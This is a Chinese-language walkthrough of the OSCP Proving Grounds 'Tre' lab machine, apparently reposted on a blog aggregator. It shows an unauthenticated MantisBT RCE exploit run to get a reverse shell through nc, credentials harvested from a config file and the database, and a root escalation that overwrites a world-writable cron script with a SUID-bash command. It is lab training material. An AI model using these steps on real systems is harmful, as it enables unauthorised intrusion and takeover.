OSCP - Proving Grounds

OSCP - Proving Grounds - tre

主要知識點

突破邊界的方法比較多樣
觀察pspy64的檢測結果

具體步驟

依舊nmap掃描開始,開放了80,8082,22端口

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-16 03:39 UTC
Nmap scan report for 192.168.56.84
Host is up (0.00083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)
|   256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)
|_  256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Tre
8082/tcp open  http    nginx 1.14.2
|_http-title: Tre
|_http-server-header: nginx/1.14.2
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

其中80端口會提供比較多的信息，隱藏路徑還真不少

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.117.84/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/cms                  (Status: 301) [Size: 314] [--> http://192.168.117.84/cms/]
/mantisbt             (Status: 301) [Size: 319] [--> http://192.168.117.84/mantisbt/]
/server-status        (Status: 403) [Size: 279]
/system               (Status: 401) [Size: 461]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================

其中mantisbt，搜索一下有一個RCE漏洞，不過目前沒有拿到版本信息，只能抱著試試看的想法試試

C:\home\kali\Documents\OFFSEC\play\Tre> searchsploit -m 48818          Exploit: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)URL: https://www.exploit-db.com/exploits/48818Path: /usr/share/exploitdb/exploits/php/webapps/48818.pyCodes: CVE-2019-15715, CVE-2017-7615Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Documents/OFFSEC/play/Tre/48818.pyC:\home\kali\Documents\OFFSEC\play\Tre> python2 48818.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned up

在本地的nc -nlvp 80則會收到reverse shell

C:\home\kali\Documents\OFFSEC\play\Tre> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.117.84] 38846
bash: cannot set terminal process group (569): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tre:/var/www/html/mantisbt$

調用pspy64來觀察，發現基本上每秒鐘都會執行一次，且我們對于這個 /usr/bin/check-system有寫權限

2024/12/16 07:47:15 CMD: UID=0    PID=1434   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:16 CMD: UID=0    PID=1436   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:17 CMD: UID=0    PID=1437   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:18 CMD: UID=0    PID=1438   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:19 CMD: UID=0    PID=1439   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:20 CMD: UID=0    PID=1440   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:21 CMD: UID=0    PID=1441   | /bin/bash /usr/bin/check-system ......
......www-data@tre:/var/www/html/mantisbt$ ls -l /usr/bin/check-system
ls -l /usr/bin/check-system
-rw----rw- 1 root root 135 May 12  2020 /usr/bin/check-systemwww-data@tre:/var/www/html/mantisbt$ cat /usr/bin/check-system
cat /usr/bin/check-system
DATE=`date '+%Y-%m-%d %H:%M:%S'`
echo "Service started at ${DATE}" | systemd-cat -p infowhile :
do
echo "Checking...";
sleep 1;
done

直接覆蓋掉，賦予/bin/bash SUID權限，但是發現不成功，懷疑是該腳本循環執行，即使更改文件也無法立刻生效

echo "chmod +s /bin/bash" > /usr/bin/check-system
cat /usr/bin/check-system
chmod +s /bin/bash

上傳并執行linpeas.sh，發現一個有趣的文件?/var/www/html/mantisbt/config/config_inc.php,其中包括數據庫的用戶名和密碼,但是無法從命令行登錄

$g_hostname               = 'localhost';
$g_db_type                = 'mysqli';
$g_database_name          = 'mantis';
$g_db_username            = 'mantissuser';
$g_db_password            = 'password@123AS';

繼續搜索，發現了一個adminer.php,這個文件在路徑爆破的時候沒有發現，應該是字典問題

drwxr-xr-x 16 www-data www-data  12288 Apr  1  2017 mantisbt
-rw-r--r--  1 www-data www-data 227984 Oct 24  2017 file.jpg
drwxr-xr-x  3 root     root       4096 May 12  2020 ..
-rw-r--r--  1 www-data www-data    164 May 12  2020 index.html
-rw-r--r--  1 root     root         20 May 12  2020 info.php
drwxr-xr-x 16 root     root      12288 May 12  2020 system
-rw-r--r--  1 root     root     489307 May 12  2020 adminer.php
drwxr-xr-x  5 www-data www-data   4096 May 12  2020 .
drwxr-xr-x  9 www-data www-data   4096 May 12  2020 cms
pwd
/var/www/html

訪問一下，是一個mysql 的web UI,用發現的mantissuser/password@123AS來登錄，成功,其中mantis_user_table中的tre行對應的realname好像是一個密碼，而恰好remote server有一個tre的用戶

嘗試su tre，成功，并且發現了該用戶可以重啟服務器

www-data@tre:/tmp$ su tre
su tre
Password: Tr3@123456A!id
uid=1000(tre) gid=1000(tre) groups=1000(tre),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
sudo -l
Matching Defaults entries for tre on tre:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser tre may run the following commands on tre:(ALL) NOPASSWD: /sbin/shutdown

也許我們可以重啟服務器后再看/usr/bin/check-system的改動會不會生效

sudo /sbin/shutdown -r
Shutdown scheduled for Mon 2024-12-16 08:03:36 EST, use 'shutdown -c' to cancel.Session terminated, killing shell... ...killed.
bash: [1497: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@tre:/var/www/html/mantisbt$ exit

等服務器重啟好以后，按照相同的步驟重新創建reverse shell，提權成功

C:\home\kali\Documents\OFFSEC\play\Tre> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.117.84] 37042
bash: cannot set terminal process group (508): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
bash-5.0$ /bin/bash -p
/bin/bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
cat /root/proof.txt
22f5d43e241d15a25e6d1eae87510c31

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/bicheng/87196.shtml
繁體地址，請注明出處：http://hk.pswp.cn/bicheng/87196.shtml
英文地址，請注明出處：http://en.pswp.cn/bicheng/87196.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！